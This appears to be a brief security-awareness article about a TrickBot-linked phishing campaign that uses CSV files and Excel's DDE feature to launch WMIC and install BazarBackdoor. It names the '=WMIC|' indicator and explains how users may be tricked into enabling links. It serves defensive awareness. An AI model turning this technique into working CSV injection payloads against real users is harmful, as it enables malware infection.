A new phishing campaign is using CSV files to deliver malware to unsuspecting users who mistakenly think that plain text CSV files are safe to open in Excel.

Comma Separated Variable (CSV) files are produced by many applications as a kind of universally compatible report format as they consist of simple text files which contain lists of values separated by commas.  In a world where the threats of malicious Microsoft Office documents and PDF files are well understood, your team may be mistaken into thinking that a CSV is always safe to open.  For Windows computers with Excel installed, this is not always the case.

When opening a CSV text file, Excel can be instructed to perform DDE commands such as running another program and this in turn can download malicious scripts and execute them on the victim’s computer.

The instruction =WMIC| within one of the lines of the CSV file is the warning that Excel’s Dynamic Data Exchange feature is being used to invoke the Windows Management Interface Console.  A new phishing campaign linked to the TrickBot group is using this technique to install BazarBackdoor trojan software on the victim’s computer.

When encountering a DDE link in a CSV file, modern versions of Excel will warn the user of a potential security concern with a pop-up warning that ‘automatic updating of links has been disabled‘ and that Excel is trying to start the WMIC.exe application but the user could be tricked into enabling the links by instructions in the Email which delivered the CSV file in the first place.  (Especially as a quick Google search of WMIC.exe would reveal it is a valid part of Microsoft Windows)

If your Security Awareness Training has included any guidance that CSV files are safe to open compared to PDF or Office Document files, then you may wish to consider revising this advice.